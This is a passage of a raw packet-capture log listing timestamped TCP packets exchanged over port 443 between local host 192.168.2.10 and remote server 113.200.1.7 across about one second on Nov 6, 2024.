                                                                                                                                            Nov 6, 2024 16:40:50.821661949 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.821677923 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.821707964 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.821857929 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.821873903 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.821926117 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.821933031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.822386026 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.822405100 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.822442055 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.822452068 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.822479010 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.822498083 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.879861116 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.879880905 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.879992008 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.880023956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.880080938 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.880203962 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.880217075 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.880273104 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.880279064 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.880319118 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.927345037 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.927369118 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.927453995 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.927479982 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.929214954 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.938179016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.938204050 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.938256025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.938273907 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.938286066 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.938312054 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.939434052 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.939456940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.939496040 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.939502954 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.939532995 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.940138102 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.940152884 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.940207005 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.940212011 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.940303087 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941308022 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941327095 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941384077 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941391945 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941459894 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941538095 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941551924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941591024 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941593885 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.941643000 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941660881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.941988945 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.942003965 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.942042112 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.942045927 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.942075014 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.942095995 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.999167919 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999191046 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999310970 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.999340057 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999398947 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.999597073 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999610901 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999686003 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.999691010 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.999752998 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.035480022 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.035499096 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.035737038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.035764933 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.035832882 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.057502985 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.057518959 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.057667971 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.057698965 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.057760954 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.058414936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.058433056 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.058490038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.058496952 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.058537006 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.059838057 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.059853077 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.059921026 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.059926987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.059969902 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.060364008 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.060376883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.060441971 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.060447931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.060488939 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.061023951 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061039925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061109066 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.061114073 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061153889 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.061496019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061510086 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061568022 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.061573029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.061614037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.118475914 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118494987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118565083 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.118591070 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118632078 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.118746996 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118761063 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118813038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.118817091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.118849039 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.154751062 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.154778004 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.154872894 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.154913902 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.154961109 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.166390896 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.166420937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.166501999 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.166527987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.166574001 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.177325010 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177345037 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177395105 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.177418947 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177453041 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.177469015 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.177855968 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177874088 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177923918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.177933931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.177975893 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180174112 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180193901 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180249929 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180260897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180321932 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180417061 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180434942 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180490971 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180496931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180509090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180527925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180531025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180542946 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180560112 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180599928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181245089 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181262970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181308985 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181327105 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181344986 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181372881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.237803936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.237829924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.237992048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.238071918 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238168955 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238188982 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238266945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.238284111 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238344908 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.274533033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274549961 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274677038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.274744034 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274820089 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.285615921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285631895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285682917 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.285706997 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285768986 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.296622038 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296639919 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296705961 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.296736956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296808958 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.297065020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297086000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297144890 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.297151089 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297197104 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299299002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299319029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299367905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299381018 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299426079 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299756050 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299770117 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299818993 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299824953 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299865961 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300434113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300448895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300506115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300513029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300563097 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300863028 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300878048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300930977 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300935984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300977945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357346058 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357364893 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357495070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357536077 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357600927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357657909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357671022 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357753992 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357767105 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357851982 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.393738031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.393760920 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.393961906 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.393985987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.394063950 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.404902935 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.404917002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.405028105 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.405091047 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.405149937 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.415077925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415093899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415159941 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.415183067 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415229082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.416121960 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416137934 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416212082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.416224003 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416268110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.419872999 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.419887066 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.419950962 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.419969082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420016050 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420265913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420279980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420336008 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420341969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420384884 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420533895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420552969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420600891 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420605898 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420651913 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421468019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421483040 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421538115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421542883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421586037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421681881 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421695948 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421749115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421753883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421797991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.476809978 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.476828098 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.476933956 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477004051 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477049112 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477066994 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477102995 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477121115 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477147102 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477164984 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.513097048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513122082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513257027 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.513281107 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513333082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.524295092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.524317980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.524393082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.524409056 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.527034998 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.534873009 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.534888983 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.534965038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.534981012 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.535033941 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.535430908 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.535444975 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.535506010 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.535520077 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.535573959 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.539288044 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539304018 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539385080 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.539402962 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539458990 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.539720058 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539733887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539803028 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.539817095 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539875031 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.539885998 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.539900064 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.540014029 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.540014029 CET57356443192.168.2.10113.200.1.7
